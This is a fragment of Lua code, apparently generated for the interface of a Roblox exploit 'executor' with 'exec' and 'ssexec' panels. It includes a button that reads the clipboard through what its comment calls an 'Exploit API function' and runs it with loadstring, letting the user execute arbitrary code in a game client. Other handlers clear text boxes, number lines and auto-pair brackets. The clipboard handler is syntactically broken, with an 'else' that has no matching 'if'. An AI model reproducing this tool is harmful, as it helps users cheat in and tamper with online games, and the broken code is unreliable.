-- StarterGui.main.mainframe.exec.TextButton.LocalScript
local function C_55()
local script = G2L["55"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent:FindFirstChild("text"):FindFirstChild("TextBox").Text = ""
	end)
end;
task.spawn(C_55);
-- StarterGui.main.mainframe.exec.TextButton.LocalScript
local function C_59()
local script = G2L["59"];
	script.Parent.MouseButton1Click:Connect(function()
		local clipboard = getclipboard() -- Exploit API function
			local func = loadstring(clipboard)
			if func then
				func()
			else
				warn("Clipboard loadstring failed.")
			end
		else
			warn("Clipboard is empty or invalid.")
		end
	end)
end;
task.spawn(C_59);
-- StarterGui.main.mainframe.ssexec.text.TextBox.LocalScript
local function C_63()
local script = G2L["63"];
	local textBox = script.Parent
	local parent = textBox.Parent
	local textLabel = parent:FindFirstChild("TextLabel")
	
	local function updateLineNumbers()
		if not textLabel then return end
		
		local lines = string.split(textBox.Text, "\n")
		local numberedLines = {}
		
		for i = 1, #lines do
			table.insert(numberedLines, tostring(i))
		end
		
		textLabel.Text = table.concat(numberedLines, "\n")
	end
	
	textBox:GetPropertyChangedSignal("Text"):Connect(updateLineNumbers)
	
	updateLineNumbers()
end;
task.spawn(C_63);
-- StarterGui.main.mainframe.ssexec.text.TextBox.LocalScript
local function C_64()
local script = G2L["64"];
	local textBox = script.Parent
	local lastText = ""
	
	textBox:GetPropertyChangedSignal("Text"):Connect(function()
		local currentText = textBox.Text
		local cursor = textBox.CursorPosition
		
		-- Detect insertion
		if #currentText == #lastText + 1 then
			local typedChar = currentText:sub(cursor - 1, cursor - 1)
			
			local function insertPair(openChar, closeChar)
				local before = currentText:sub(1, cursor - 2)
				local after = currentText:sub(cursor)
				textBox.Text = before .. openChar .. closeChar .. after
				textBox.CursorPosition = #before + 2
			end
			
			if typedChar == "(" then
				insertPair("(", ")")
			elseif typedChar == "\"" then
				insertPair("\"", "\"")
			elseif typedChar == "'" then
				insertPair("'", "'")
			end
			
			-- Detect deletion of opening char
		elseif #currentText == #lastText - 1 then
			local deletedPos = cursor
			local deletedChar = lastText:sub(deletedPos, deletedPos)
			local nextChar = currentText:sub(deletedPos, deletedPos)
			
			local function shouldDeletePair(openChar, closeChar)
				return deletedChar == openChar and nextChar == closeChar
			end
			
			if shouldDeletePair("(", ")") or shouldDeletePair("\"", "\"") or shouldDeletePair("'", "'") then
				local before = currentText:sub(1, deletedPos - 1)
				local after = currentText:sub(deletedPos + 1)
				textBox.Text = before .. after
				textBox.CursorPosition = deletedPos
			end
		end
		
		lastText = textBox.Text
	end)
end;
task.spawn(C_64);
-- StarterGui.main.mainframe.ssexec.TextButton.LocalScript
local function C_6b()
local script = G2L["6b"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent:FindFirstChild("text"):FindFirstChild("TextBox").Text = ""
	end)
end;
task.spawn(C_6b);

return G2L["1"], require;
